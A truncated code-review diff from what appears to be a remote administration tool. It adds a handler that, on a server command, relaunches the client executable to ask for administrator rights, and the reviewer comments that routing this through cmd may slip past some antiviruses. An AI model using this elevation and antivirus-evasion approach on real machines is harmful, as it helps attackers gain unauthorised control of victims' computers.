Client/Core/Commands/SystemHandler.cs

```diff
@@ -438,6 +439,35 @@ public static void HandleDoProcessKill(Packets.ServerPackets.DoProcessKill comma
             }
         }
 
+        public static void HandleAskElevate(Packets.ServerPackets.DoAskElevate command, Client client)
+        {
+            if (!(WindowsAccountHelper.GetAccountType() == "Admin"))
+            {
+                ProcessStartInfo proc = new ProcessStartInfo();
+                proc.UseShellExecute = true;
+                proc.WorkingDirectory = Environment.CurrentDirectory;
+                proc.FileName = Application.ExecutablePath;
```

Comment:
The example is just from client's shell but you can change it to true
The point that when using cmd the client will accept the elevation of system process, I think it may be good with some antiviruses and the client would trust and elevate it.
[sorry for my English as it is not my first language]